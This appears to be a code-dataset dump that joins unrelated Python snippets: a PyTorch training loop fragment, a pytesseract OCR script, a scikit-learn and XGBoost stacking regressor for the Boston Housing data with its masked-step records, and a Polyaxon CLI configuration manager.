batch = batch.cuda()\n loss = model(batch)\n loss.backward()\n optimizer.step()\n bar.update(1)\n bar_loss = ((bar_loss * i) + 
float(loss.detach())) / (i + 1) # Rolling mean loss\n bar.set_postfix_str(f\"Loss: {bar_loss:.3f}\")\n if i == batches_per_epoch - 1:\n break\n with tqdm(total=eval_batches_per_epoch, dynamic_ncols=True) as bar:\n bar.set_description(f\"Eval epoch {epoch}\")\n bar_loss = 0.\n model.eval()\n with torch.no_grad():\n for i, batch in enumerate(test_loader):\n batch = batch.cuda()\n loss = model(batch)\n bar.update(1)\n bar_loss = ((bar_loss * i) + float(loss.detach())) / (i + 1) # Rolling mean loss\n bar.set_postfix_str(f\"Loss: {bar_loss:.3f}\")\n if i == eval_batches_per_epoch - 1:\n break\n torch.save({\n 'epoch': epoch,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict()\n }, str(save_path))\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
4,
7,
9,
10,
11
]
}
|
[
4,
7,
9,
10,
11
] |
""" OCR that converts images to text """
from pytesseract import image_to_string
from PIL import Image
print(image_to_string(Image.open('/Users/williamliu/Desktop/Screen Shot 2014-09-27 at 11.45.34 PM.png')))
#print(image_to_string(Image.open('/Users/williamliu/Desktop/Screen Shot 2014-09-27 at 11.45.34 PM.png')))
#print(image_to_string(Image.open('test-european.jpg'), lang='fra'))
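# Note: pytesseract is only a thin wrapper around the Tesseract OCR engine, so the
# tesseract binary itself must be installed and on the PATH for image_to_string to
# work; the lang='fra' call above additionally assumes the French language data pack
# for Tesseract is installed.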
|
normal
|
{
"blob_id": "91ac4a23573abcb0ab024830dbc1daebd91bd40d",
"index": 2355,
"step-1": "\"\"\" OCR that converts images to text \"\"\"\n\nfrom pytesseract import image_to_string\nfrom PIL import Image\n\nprint image_to_string(Image.open('/Users/williamliu/Desktop/Screen Shot 2014-09-27 at 11.45.34 PM.png'))\n\n#print image_to_string(Image.open('/Users/williamliu/Desktop/Screen Shot 2014-09-27 at 11.45.34 PM.png'))\n#print image_to_string(Image.open('test-european.jpg'), lang='fra')\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/env python
# Title : STACK_BostonHousing.py
# Description : Stacking was the natural progression of our algorithms trial.
#                Here we'll use predictions from a number of models in order
#                to improve accuracy, since they add linearly independent data
#                to our dataset. We also use a voting ensemble, using the best
#                estimator three times in the stack of second-level models.
#                We'll find the CV score of each model on a train_test_split,
#                then stack the models on a 5-fold KFold of the data to find
#                the final CV score. We'll also plot a comparative graph of
#                Real Prices vs Predicted Prices.
# Author : Neves4
# Outputs : Figure with one plot : 'Real Prices vs Predicted prices'
# Values : SVR CV Scores: 0.6798 (+/- 0.0895)
# XGB CV Scores: 0.8784 (+/- 0.0598)
# RF CV Scores: 0.8601 (+/- 0.0789)
# STACK CV Scores: 0.8809 (+/- 0.0864)
# License : MIT License
#==============================================================================
##### IMPORTING #####
import numpy as np
import xgboost as xgb
from sklearn import datasets
import seaborn as sns
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.linear_model import ElasticNet
from sklearn.ensemble import RandomForestRegressor
from sklearn.svm import SVR
from sklearn.model_selection import cross_val_score, train_test_split, KFold
from sklearn.metrics import r2_score
sns.set() # set seaborn style
##### DECLARING AND TRAINING #####
# Load the Boston dataset, convert it to a pandas DataFrame and, since the
# column naming is not automatic, assign the feature names to the columns.
# To inspect the data, call print(boston_pd.head())
boston = datasets.load_boston()
boston_pd = pd.DataFrame(boston.data)
boston_pd.columns = boston.feature_names
# The datasets then need to be split with the train_test_split method. To
# check the size of each resulting array, print(X_train.shape)
X, Y = boston_pd, boston.target
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.1,
random_state = 42)
# ##### 1ST LEVEL MODELS #####
# # ElasticNet - baseline model #0
# print("------- FITTING ElasticNet -------")
# en_mdl = ElasticNet(alpha = 5.2, l1_ratio = 0.5, random_state = 42)
# en_cv_scores = cross_val_score(en_mdl, X_train, Y_train, cv=5, scoring='r2')
# print(" DONE! CV Scores: {:.4f} (+/- {:.4f})" .format(en_cv_scores.mean(),\
# en_cv_scores.std() * 2))
# SVR - baseline model #1
print("------- FITTING SVR -------")
svr_mdl = SVR(kernel = 'linear', C = 0.11, epsilon = 0.011, gamma = 0.1)
svr_cv_scores = cross_val_score(svr_mdl, X_train, Y_train, cv=5, scoring='r2')
print(" DONE! CV Scores: {:.4f} (+/- {:.4f})" .format(svr_cv_scores.mean(),\
svr_cv_scores.std() * 2))
# XGBRegressor - baseline model #2
print("------- FITTING XGBRegressor -------")
xgb_mdl = xgb.XGBRegressor(learning_rate = 0.0503, n_estimators = 339,
max_depth = 5, min_child_weight = 2, gamma = 0.17,
subsample = 0.84, colsample_bytree = 0.85,
reg_alpha = 0.008, reg_lambda = 1.2,
scale_pos_weight = 1, seed = 42)
xgb_cv_scores = cross_val_score(xgb_mdl, X_train, Y_train, cv=5, scoring='r2')
print(" DONE! CV Scores: {:.4f} (+/- {:.4f})" .format(xgb_cv_scores.mean(),\
xgb_cv_scores.std() * 2))
# RandomForestRegressor - baseline model #3
print("------- FITTING RandomForestRegressor -------")
rf_mdl = RandomForestRegressor(n_estimators = 95, max_features = 'auto',
max_depth = 18, min_samples_split = 2,
min_samples_leaf = 1, bootstrap = True,
random_state = 42)
rf_cv_scores = cross_val_score(rf_mdl, X_train, Y_train, cv=5, scoring='r2')
print(" DONE! CV Scores: {:.4f} (+/- {:.4f})" .format(rf_cv_scores.mean(),\
rf_cv_scores.std() * 2))
class Ensemble(object):
"""Ensemble base_models on train data than fit/predict
The object input is composed of 'n_splits', 'stacker' and list of
'base_models'.
The __init__ method self-assign the inputs.
The fit_predict method divides the dataset in 'n_splits' then it loops
trough ammount of 'base_models' fitting all splits and then averaging it on
a new column in the end. In the end, predictions are made with these new
columns.
If sought the use of voting ensemble, the ammount of models passed on
base_models can be repeated.
"""
def __init__(self, n_splits, stacker, base_models):
self.n_splits = n_splits
self.stacker = stacker
self.base_models = base_models
def fit_predict(self, X, Y, T):
X = np.array(X)
Y = np.array(Y)
T = np.array(T)
# Create folds on the dataset based on n_splits
folds = list(KFold(n_splits = self.n_splits, shuffle = True,
random_state = 42).split(X, Y))
S_train = np.zeros((X.shape[0], len(self.base_models)))
S_test = np.zeros((T.shape[0], len(self.base_models)))
# Loop trough base_models
print("------- FITTING Stacker - 2nd level -------")
for i, clf in enumerate(self.base_models):
# Create a dummy to calculate predictions on all folds
S_test_i = np.zeros((T.shape[0], self.n_splits))
# Loop trough data folds
for j, (train_idx, test_idx) in enumerate(folds):
X_train = X[train_idx]
Y_train = Y[train_idx]
X_holdout = X[test_idx]
Y_holdout = Y[test_idx]
clf.fit(X_train, Y_train)
Y_pred = clf.predict(X_holdout)[:]
print (" Model {}, fold {}. R^2 score: {:.4f}"\
.format(i, j, r2_score(Y_holdout, Y_pred)))
S_train[test_idx, i] = Y_pred
S_test_i[:, j] = clf.predict(T)[:]
# Update test data with average of predictions from the dummy
S_test[:, i] = S_test_i.mean(axis = 1)
# Print final CV score
results = cross_val_score(self.stacker, S_train, Y, cv=5, scoring='r2')
print("\033[1;92mDONE! \033[0;0m\033[1;37mCV scores: {:.4f} (+/- {:.4f})"
.format(results.mean(), results.std() * 2))
# After creating new features on the test data, fit the chosen stacker
# on train data and finally predict on test data, then return
self.stacker.fit(S_train, Y)
final_prediction = self.stacker.predict(S_test)[:]
return final_prediction
stack = Ensemble(n_splits = 5, stacker = svr_mdl,
base_models = (xgb_mdl, rf_mdl, xgb_mdl, svr_mdl, xgb_mdl))
stack_pred = stack.fit_predict(X_train, Y_train, X_test)
##### PLOTS #####
# Plot outputs using a scatter plot. Ticks are disabled and everything else is
# kept as clean as I could make it. Predicted prices vs Real Prices
custom_style = {'axes.labelcolor': 'white',
'xtick.color': 'white',
'ytick.color': 'white'}
data = pd.DataFrame(data = {'stack_pred': stack_pred, 'Y_test': Y_test})
ax = sns.lmplot(x='Y_test', y='stack_pred', data = data, truncate=True, size=5)
ax.set_axis_labels("Real prices", "Predicted prices")
plt.tick_params(axis='both', colors='gray')
plt.title("Real vs Predicted prices on Boston Housing", fontweight = 'bold')
plt.tight_layout()
plt.show()
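# Optional sanity check: besides the CV scores reported in the header, the
# stacked predictions can also be scored directly on the held-out split.
print("STACK R^2 on the held-out split: {:.4f}".format(r2_score(Y_test, stack_pred)))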
|
normal
|
{
"blob_id": "21c581131cff8cf2f4aa407055184d56865a6335",
"index": 9783,
"step-1": "<mask token>\n\n\nclass Ensemble(object):\n \"\"\"Ensemble base_models on train data than fit/predict\n\n The object input is composed of 'n_splits', 'stacker' and list of\n 'base_models'.\n\n The __init__ method self-assign the inputs.\n\n The fit_predict method divides the dataset in 'n_splits' then it loops\n trough ammount of 'base_models' fitting all splits and then averaging it on\n a new column in the end. In the end, predictions are made with these new\n columns.\n\n If sought the use of voting ensemble, the ammount of models passed on\n base_models can be repeated.\n \"\"\"\n\n def __init__(self, n_splits, stacker, base_models):\n self.n_splits = n_splits\n self.stacker = stacker\n self.base_models = base_models\n\n def fit_predict(self, X, Y, T):\n X = np.array(X)\n Y = np.array(Y)\n T = np.array(T)\n folds = list(KFold(n_splits=self.n_splits, shuffle=True,\n random_state=42).split(X, Y))\n S_train = np.zeros((X.shape[0], len(self.base_models)))\n S_test = np.zeros((T.shape[0], len(self.base_models)))\n print('------- FITTING Stacker - 2nd level -------')\n for i, clf in enumerate(self.base_models):\n S_test_i = np.zeros((T.shape[0], self.n_splits))\n for j, (train_idx, test_idx) in enumerate(folds):\n X_train = X[train_idx]\n Y_train = Y[train_idx]\n X_holdout = X[test_idx]\n Y_holdout = Y[test_idx]\n clf.fit(X_train, Y_train)\n Y_pred = clf.predict(X_holdout)[:]\n print(' Model {}, fold {}. R^2 score: {:.4f}'.format(i, j,\n r2_score(Y_holdout, Y_pred)))\n S_train[test_idx, i] = Y_pred\n S_test_i[:, j] = clf.predict(T)[:]\n S_test[:, i] = S_test_i.mean(axis=1)\n results = cross_val_score(self.stacker, S_train, Y, cv=5, scoring='r2')\n print(\n '\\x1b[1;92mDONE! \\x1b[0;0m\\x1b[1;37mCV scores: {:.4f} (+/- {:.4f})'\n .format(results.mean(), results.std() * 2))\n self.stacker.fit(S_train, Y)\n final_prediction = self.stacker.predict(S_test)[:]\n return final_prediction\n\n\n<mask token>\n",
"step-2": "<mask token>\nsns.set()\n<mask token>\nprint('------- FITTING SVR -------')\n<mask token>\nprint(' DONE! CV Scores: {:.4f} (+/- {:.4f})'.format(svr_cv_scores.mean(),\n svr_cv_scores.std() * 2))\nprint('------- FITTING XGBRegressor -------')\n<mask token>\nprint(' DONE! CV Scores: {:.4f} (+/- {:.4f})'.format(xgb_cv_scores.mean(),\n xgb_cv_scores.std() * 2))\nprint('------- FITTING RandomForestRegressor -------')\n<mask token>\nprint(' DONE! CV Scores: {:.4f} (+/- {:.4f})'.format(rf_cv_scores.mean(), \n rf_cv_scores.std() * 2))\n\n\nclass Ensemble(object):\n \"\"\"Ensemble base_models on train data than fit/predict\n\n The object input is composed of 'n_splits', 'stacker' and list of\n 'base_models'.\n\n The __init__ method self-assign the inputs.\n\n The fit_predict method divides the dataset in 'n_splits' then it loops\n trough ammount of 'base_models' fitting all splits and then averaging it on\n a new column in the end. In the end, predictions are made with these new\n columns.\n\n If sought the use of voting ensemble, the ammount of models passed on\n base_models can be repeated.\n \"\"\"\n\n def __init__(self, n_splits, stacker, base_models):\n self.n_splits = n_splits\n self.stacker = stacker\n self.base_models = base_models\n\n def fit_predict(self, X, Y, T):\n X = np.array(X)\n Y = np.array(Y)\n T = np.array(T)\n folds = list(KFold(n_splits=self.n_splits, shuffle=True,\n random_state=42).split(X, Y))\n S_train = np.zeros((X.shape[0], len(self.base_models)))\n S_test = np.zeros((T.shape[0], len(self.base_models)))\n print('------- FITTING Stacker - 2nd level -------')\n for i, clf in enumerate(self.base_models):\n S_test_i = np.zeros((T.shape[0], self.n_splits))\n for j, (train_idx, test_idx) in enumerate(folds):\n X_train = X[train_idx]\n Y_train = Y[train_idx]\n X_holdout = X[test_idx]\n Y_holdout = Y[test_idx]\n clf.fit(X_train, Y_train)\n Y_pred = clf.predict(X_holdout)[:]\n print(' Model {}, fold {}. R^2 score: {:.4f}'.format(i, j,\n r2_score(Y_holdout, Y_pred)))\n S_train[test_idx, i] = Y_pred\n S_test_i[:, j] = clf.predict(T)[:]\n S_test[:, i] = S_test_i.mean(axis=1)\n results = cross_val_score(self.stacker, S_train, Y, cv=5, scoring='r2')\n print(\n '\\x1b[1;92mDONE! \\x1b[0;0m\\x1b[1;37mCV scores: {:.4f} (+/- {:.4f})'\n .format(results.mean(), results.std() * 2))\n self.stacker.fit(S_train, Y)\n final_prediction = self.stacker.predict(S_test)[:]\n return final_prediction\n\n\n<mask token>\nax.set_axis_labels('Real prices', 'Predicted prices')\nplt.tick_params(axis='both', colors='gray')\nplt.title('Real vs Predicted prices on Boston Housing', fontweight='bold')\nplt.tight_layout()\nplt.show()\n",
"step-3": "<mask token>\nsns.set()\nboston = datasets.load_boston()\nboston_pd = pd.DataFrame(boston.data)\nboston_pd.columns = boston.feature_names\nX, Y = boston_pd, boston.target\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.1,\n random_state=42)\nprint('------- FITTING SVR -------')\nsvr_mdl = SVR(kernel='linear', C=0.11, epsilon=0.011, gamma=0.1)\nsvr_cv_scores = cross_val_score(svr_mdl, X_train, Y_train, cv=5, scoring='r2')\nprint(' DONE! CV Scores: {:.4f} (+/- {:.4f})'.format(svr_cv_scores.mean(),\n svr_cv_scores.std() * 2))\nprint('------- FITTING XGBRegressor -------')\nxgb_mdl = xgb.XGBRegressor(learning_rate=0.0503, n_estimators=339,\n max_depth=5, min_child_weight=2, gamma=0.17, subsample=0.84,\n colsample_bytree=0.85, reg_alpha=0.008, reg_lambda=1.2,\n scale_pos_weight=1, seed=42)\nxgb_cv_scores = cross_val_score(xgb_mdl, X_train, Y_train, cv=5, scoring='r2')\nprint(' DONE! CV Scores: {:.4f} (+/- {:.4f})'.format(xgb_cv_scores.mean(),\n xgb_cv_scores.std() * 2))\nprint('------- FITTING RandomForestRegressor -------')\nrf_mdl = RandomForestRegressor(n_estimators=95, max_features='auto',\n max_depth=18, min_samples_split=2, min_samples_leaf=1, bootstrap=True,\n random_state=42)\nrf_cv_scores = cross_val_score(rf_mdl, X_train, Y_train, cv=5, scoring='r2')\nprint(' DONE! CV Scores: {:.4f} (+/- {:.4f})'.format(rf_cv_scores.mean(), \n rf_cv_scores.std() * 2))\n\n\nclass Ensemble(object):\n \"\"\"Ensemble base_models on train data than fit/predict\n\n The object input is composed of 'n_splits', 'stacker' and list of\n 'base_models'.\n\n The __init__ method self-assign the inputs.\n\n The fit_predict method divides the dataset in 'n_splits' then it loops\n trough ammount of 'base_models' fitting all splits and then averaging it on\n a new column in the end. In the end, predictions are made with these new\n columns.\n\n If sought the use of voting ensemble, the ammount of models passed on\n base_models can be repeated.\n \"\"\"\n\n def __init__(self, n_splits, stacker, base_models):\n self.n_splits = n_splits\n self.stacker = stacker\n self.base_models = base_models\n\n def fit_predict(self, X, Y, T):\n X = np.array(X)\n Y = np.array(Y)\n T = np.array(T)\n folds = list(KFold(n_splits=self.n_splits, shuffle=True,\n random_state=42).split(X, Y))\n S_train = np.zeros((X.shape[0], len(self.base_models)))\n S_test = np.zeros((T.shape[0], len(self.base_models)))\n print('------- FITTING Stacker - 2nd level -------')\n for i, clf in enumerate(self.base_models):\n S_test_i = np.zeros((T.shape[0], self.n_splits))\n for j, (train_idx, test_idx) in enumerate(folds):\n X_train = X[train_idx]\n Y_train = Y[train_idx]\n X_holdout = X[test_idx]\n Y_holdout = Y[test_idx]\n clf.fit(X_train, Y_train)\n Y_pred = clf.predict(X_holdout)[:]\n print(' Model {}, fold {}. R^2 score: {:.4f}'.format(i, j,\n r2_score(Y_holdout, Y_pred)))\n S_train[test_idx, i] = Y_pred\n S_test_i[:, j] = clf.predict(T)[:]\n S_test[:, i] = S_test_i.mean(axis=1)\n results = cross_val_score(self.stacker, S_train, Y, cv=5, scoring='r2')\n print(\n '\\x1b[1;92mDONE! 
\\x1b[0;0m\\x1b[1;37mCV scores: {:.4f} (+/- {:.4f})'\n .format(results.mean(), results.std() * 2))\n self.stacker.fit(S_train, Y)\n final_prediction = self.stacker.predict(S_test)[:]\n return final_prediction\n\n\nstack = Ensemble(n_splits=5, stacker=svr_mdl, base_models=(xgb_mdl, rf_mdl,\n xgb_mdl, svr_mdl, xgb_mdl))\nstack_pred = stack.fit_predict(X_train, Y_train, X_test)\ncustom_style = {'axes.labelcolor': 'white', 'xtick.color': 'white',\n 'ytick.color': 'white'}\ndata = pd.DataFrame(data={'stack_pred': stack_pred, 'Y_test': Y_test})\nax = sns.lmplot(x='Y_test', y='stack_pred', data=data, truncate=True, size=5)\nax.set_axis_labels('Real prices', 'Predicted prices')\nplt.tick_params(axis='both', colors='gray')\nplt.title('Real vs Predicted prices on Boston Housing', fontweight='bold')\nplt.tight_layout()\nplt.show()\n",
"step-4": "import numpy as np\nimport xgboost as xgb\nfrom sklearn import datasets\nimport seaborn as sns\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import ElasticNet\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.svm import SVR\nfrom sklearn.model_selection import cross_val_score, train_test_split, KFold\nfrom sklearn.metrics import r2_score\nsns.set()\nboston = datasets.load_boston()\nboston_pd = pd.DataFrame(boston.data)\nboston_pd.columns = boston.feature_names\nX, Y = boston_pd, boston.target\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.1,\n random_state=42)\nprint('------- FITTING SVR -------')\nsvr_mdl = SVR(kernel='linear', C=0.11, epsilon=0.011, gamma=0.1)\nsvr_cv_scores = cross_val_score(svr_mdl, X_train, Y_train, cv=5, scoring='r2')\nprint(' DONE! CV Scores: {:.4f} (+/- {:.4f})'.format(svr_cv_scores.mean(),\n svr_cv_scores.std() * 2))\nprint('------- FITTING XGBRegressor -------')\nxgb_mdl = xgb.XGBRegressor(learning_rate=0.0503, n_estimators=339,\n max_depth=5, min_child_weight=2, gamma=0.17, subsample=0.84,\n colsample_bytree=0.85, reg_alpha=0.008, reg_lambda=1.2,\n scale_pos_weight=1, seed=42)\nxgb_cv_scores = cross_val_score(xgb_mdl, X_train, Y_train, cv=5, scoring='r2')\nprint(' DONE! CV Scores: {:.4f} (+/- {:.4f})'.format(xgb_cv_scores.mean(),\n xgb_cv_scores.std() * 2))\nprint('------- FITTING RandomForestRegressor -------')\nrf_mdl = RandomForestRegressor(n_estimators=95, max_features='auto',\n max_depth=18, min_samples_split=2, min_samples_leaf=1, bootstrap=True,\n random_state=42)\nrf_cv_scores = cross_val_score(rf_mdl, X_train, Y_train, cv=5, scoring='r2')\nprint(' DONE! CV Scores: {:.4f} (+/- {:.4f})'.format(rf_cv_scores.mean(), \n rf_cv_scores.std() * 2))\n\n\nclass Ensemble(object):\n \"\"\"Ensemble base_models on train data than fit/predict\n\n The object input is composed of 'n_splits', 'stacker' and list of\n 'base_models'.\n\n The __init__ method self-assign the inputs.\n\n The fit_predict method divides the dataset in 'n_splits' then it loops\n trough ammount of 'base_models' fitting all splits and then averaging it on\n a new column in the end. In the end, predictions are made with these new\n columns.\n\n If sought the use of voting ensemble, the ammount of models passed on\n base_models can be repeated.\n \"\"\"\n\n def __init__(self, n_splits, stacker, base_models):\n self.n_splits = n_splits\n self.stacker = stacker\n self.base_models = base_models\n\n def fit_predict(self, X, Y, T):\n X = np.array(X)\n Y = np.array(Y)\n T = np.array(T)\n folds = list(KFold(n_splits=self.n_splits, shuffle=True,\n random_state=42).split(X, Y))\n S_train = np.zeros((X.shape[0], len(self.base_models)))\n S_test = np.zeros((T.shape[0], len(self.base_models)))\n print('------- FITTING Stacker - 2nd level -------')\n for i, clf in enumerate(self.base_models):\n S_test_i = np.zeros((T.shape[0], self.n_splits))\n for j, (train_idx, test_idx) in enumerate(folds):\n X_train = X[train_idx]\n Y_train = Y[train_idx]\n X_holdout = X[test_idx]\n Y_holdout = Y[test_idx]\n clf.fit(X_train, Y_train)\n Y_pred = clf.predict(X_holdout)[:]\n print(' Model {}, fold {}. R^2 score: {:.4f}'.format(i, j,\n r2_score(Y_holdout, Y_pred)))\n S_train[test_idx, i] = Y_pred\n S_test_i[:, j] = clf.predict(T)[:]\n S_test[:, i] = S_test_i.mean(axis=1)\n results = cross_val_score(self.stacker, S_train, Y, cv=5, scoring='r2')\n print(\n '\\x1b[1;92mDONE! 
\\x1b[0;0m\\x1b[1;37mCV scores: {:.4f} (+/- {:.4f})'\n .format(results.mean(), results.std() * 2))\n self.stacker.fit(S_train, Y)\n final_prediction = self.stacker.predict(S_test)[:]\n return final_prediction\n\n\nstack = Ensemble(n_splits=5, stacker=svr_mdl, base_models=(xgb_mdl, rf_mdl,\n xgb_mdl, svr_mdl, xgb_mdl))\nstack_pred = stack.fit_predict(X_train, Y_train, X_test)\ncustom_style = {'axes.labelcolor': 'white', 'xtick.color': 'white',\n 'ytick.color': 'white'}\ndata = pd.DataFrame(data={'stack_pred': stack_pred, 'Y_test': Y_test})\nax = sns.lmplot(x='Y_test', y='stack_pred', data=data, truncate=True, size=5)\nax.set_axis_labels('Real prices', 'Predicted prices')\nplt.tick_params(axis='both', colors='gray')\nplt.title('Real vs Predicted prices on Boston Housing', fontweight='bold')\nplt.tight_layout()\nplt.show()\n",
"step-5": "#!/usr/bin/env python\n# Title : STACK_BostonHousing.py\n# Description : Stacking was the natural progression of our algorithms trial.\n# In here, we'll use prediction from a number of models in order\n# to improve accuracy as it add linearly independent data to our\n# dataset. Here we also use voting ensembler, using the best es-\n# timator three timers on the stack of second level models.\n# We'll find CV scores of each model on train_test_split then\n# stack the models on a 5-KFold of the data, finding final CV\n# score. We'll also plot the comparative graph of Real Prices vs\n# Predicted Prices\n# Author : Neves4\n# Outputs : Figure with one plot : 'Real Prices vs Predicted prices'\n# Values : SVR CV Scores: 0.6798 (+/- 0.0895)\n# XGB CV Scores: 0.8784 (+/- 0.0598)\n# RF CV Scores: 0.8601 (+/- 0.0789)\n# STACK CV Scores: 0.8809 (+/- 0.0864)\n# License : MIT License\n#==============================================================================\n\n##### IMPORTING #####\nimport numpy as np\nimport xgboost as xgb\nfrom sklearn import datasets\nimport seaborn as sns\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import ElasticNet\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.svm import SVR\nfrom sklearn.model_selection import cross_val_score, train_test_split, KFold\nfrom sklearn.metrics import r2_score\n\nsns.set() # set seaborn style\n\n##### DECLARING AND TRAINING #####\n# Carregamento do dataset do boston, conversão para o framework pandas e como a\n# nomenclatura não é automática, foi dado valor às colunas da tabela do pandas.\n# Para verificar como estão os dados, chamar print(boston_pd.head())\nboston = datasets.load_boston()\nboston_pd = pd.DataFrame(boston.data)\nboston_pd.columns = boston.feature_names\n\n# É necessária então a divisão dos datasets, pelo método train_test_split. Para\n# encontrar o tamanho de cada tensor que foi dividido, print(X_train.shape)\nX, Y = boston_pd, boston.target\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.1,\n random_state = 42)\n\n# ##### 1ST LEVEL MODELS #####\n# # ElasticNet - baseline model #0\n# print(\"------- FITTING ElasticNet -------\")\n# en_mdl = ElasticNet(alpha = 5.2, l1_ratio = 0.5, random_state = 42)\n# en_cv_scores = cross_val_score(en_mdl, X_train, Y_train, cv=5, scoring='r2')\n# print(\" DONE! CV Scores: {:.4f} (+/- {:.4f})\" .format(en_cv_scores.mean(),\\\n# en_cv_scores.std() * 2))\n\n# SVR - baseline model #1\nprint(\"------- FITTING SVR -------\")\nsvr_mdl = SVR(kernel = 'linear', C = 0.11, epsilon = 0.011, gamma = 0.1)\nsvr_cv_scores = cross_val_score(svr_mdl, X_train, Y_train, cv=5, scoring='r2')\nprint(\" DONE! CV Scores: {:.4f} (+/- {:.4f})\" .format(svr_cv_scores.mean(),\\\n svr_cv_scores.std() * 2))\n\n# XGBRegressor - baseline model #2\nprint(\"------- FITTING XGBRegressor -------\")\nxgb_mdl = xgb.XGBRegressor(learning_rate = 0.0503, n_estimators = 339,\n max_depth = 5, min_child_weight = 2, gamma = 0.17,\n subsample = 0.84, colsample_bytree = 0.85,\n reg_alpha = 0.008, reg_lambda = 1.2,\n scale_pos_weight = 1, seed = 42)\nxgb_cv_scores = cross_val_score(xgb_mdl, X_train, Y_train, cv=5, scoring='r2')\nprint(\" DONE! 
CV Scores: {:.4f} (+/- {:.4f})\" .format(xgb_cv_scores.mean(),\\\n xgb_cv_scores.std() * 2))\n\n# RandomForestRegressor - baseline model #3\nprint(\"------- FITTING RandomForestRegressor -------\")\nrf_mdl = RandomForestRegressor(n_estimators = 95, max_features = 'auto',\n max_depth = 18, min_samples_split = 2,\n min_samples_leaf = 1, bootstrap = True,\n random_state = 42)\nrf_cv_scores = cross_val_score(rf_mdl, X_train, Y_train, cv=5, scoring='r2')\nprint(\" DONE! CV Scores: {:.4f} (+/- {:.4f})\" .format(rf_cv_scores.mean(),\\\n rf_cv_scores.std() * 2))\n\nclass Ensemble(object):\n \"\"\"Ensemble base_models on train data than fit/predict\n\n The object input is composed of 'n_splits', 'stacker' and list of\n 'base_models'.\n\n The __init__ method self-assign the inputs.\n\n The fit_predict method divides the dataset in 'n_splits' then it loops\n trough ammount of 'base_models' fitting all splits and then averaging it on\n a new column in the end. In the end, predictions are made with these new\n columns.\n\n If sought the use of voting ensemble, the ammount of models passed on\n base_models can be repeated.\n \"\"\"\n\n def __init__(self, n_splits, stacker, base_models):\n self.n_splits = n_splits\n self.stacker = stacker\n self.base_models = base_models\n\n def fit_predict(self, X, Y, T):\n X = np.array(X)\n Y = np.array(Y)\n T = np.array(T)\n\n # Create folds on the dataset based on n_splits\n folds = list(KFold(n_splits = self.n_splits, shuffle = True,\n random_state = 42).split(X, Y))\n\n S_train = np.zeros((X.shape[0], len(self.base_models)))\n S_test = np.zeros((T.shape[0], len(self.base_models)))\n\n # Loop trough base_models\n print(\"------- FITTING Stacker - 2nd level -------\")\n for i, clf in enumerate(self.base_models):\n\n # Create a dummy to calculate predictions on all folds\n S_test_i = np.zeros((T.shape[0], self.n_splits))\n\n # Loop trough data folds\n for j, (train_idx, test_idx) in enumerate(folds):\n X_train = X[train_idx]\n Y_train = Y[train_idx]\n X_holdout = X[test_idx]\n Y_holdout = Y[test_idx]\n\n clf.fit(X_train, Y_train)\n Y_pred = clf.predict(X_holdout)[:]\n\n print (\" Model {}, fold {}. R^2 score: {:.4f}\"\\\n .format(i, j, r2_score(Y_holdout, Y_pred)))\n\n S_train[test_idx, i] = Y_pred\n S_test_i[:, j] = clf.predict(T)[:]\n\n # Update test data with average of predictions from the dummy\n S_test[:, i] = S_test_i.mean(axis = 1)\n\n # Print final CV score\n results = cross_val_score(self.stacker, S_train, Y, cv=5, scoring='r2')\n print(\"\\033[1;92mDONE! \\033[0;0m\\033[1;37mCV scores: {:.4f} (+/- {:.4f})\"\n .format(results.mean(), results.std() * 2))\n\n # After creating new features on the test data, fit the chosen stacker\n # on train data and finally predict on test data, then return\n self.stacker.fit(S_train, Y)\n final_prediction = self.stacker.predict(S_test)[:]\n\n return final_prediction\n\nstack = Ensemble(n_splits = 5, stacker = svr_mdl,\n base_models = (xgb_mdl, rf_mdl, xgb_mdl, svr_mdl, xgb_mdl))\n\nstack_pred = stack.fit_predict(X_train, Y_train, X_test)\n\n##### PLOTS #####\n# Plot outputs using scatter. Ticks are diabled and everything else is the clea-\n# nest that I could. 
Predicted prices vs Real Prices\ncustom_style = {'axes.labelcolor': 'white',\n 'xtick.color': 'white',\n 'ytick.color': 'white'}\ndata = pd.DataFrame(data = {'stack_pred': stack_pred, 'Y_test': Y_test})\nax = sns.lmplot(x='Y_test', y='stack_pred', data = data, truncate=True, size=5)\nax.set_axis_labels(\"Real prices\", \"Predicted prices\")\nplt.tick_params(axis='both', colors='gray')\nplt.title(\"Real vs Predicted prices on Boston Housing\", fontweight = 'bold')\nplt.tight_layout()\nplt.show()\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
#!/usr/bin/python
#
# Copyright 2018-2020 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from distutils.version import LooseVersion # pylint:disable=import-error
from polyaxon.managers.base import BaseConfigManager
from polyaxon.schemas.cli.cli_config import CliConfigurationConfig
class CliConfigManager(BaseConfigManager):
"""Manages access cli configuration .cli file."""
VISIBILITY = BaseConfigManager.VISIBILITY_GLOBAL
CONFIG_FILE_NAME = ".cli"
CONFIG = CliConfigurationConfig
FREQUENCY = 3
@classmethod
def _get_count(cls):
config = cls.get_config_or_default()
return config.check_count + 1
@classmethod
def reset(
cls,
check_count=None,
current_version=None,
server_versions=None,
log_handler=None,
):
if not any([check_count, current_version, server_versions, log_handler]):
return
cli_config = cls.get_config_or_default()
if check_count is not None:
cli_config.check_count = check_count
if current_version is not None:
cli_config.current_version = current_version
if server_versions is not None:
cli_config.server_versions = server_versions
if log_handler is not None:
cli_config.log_handler = log_handler
CliConfigManager.set_config(config=cli_config)
return cli_config
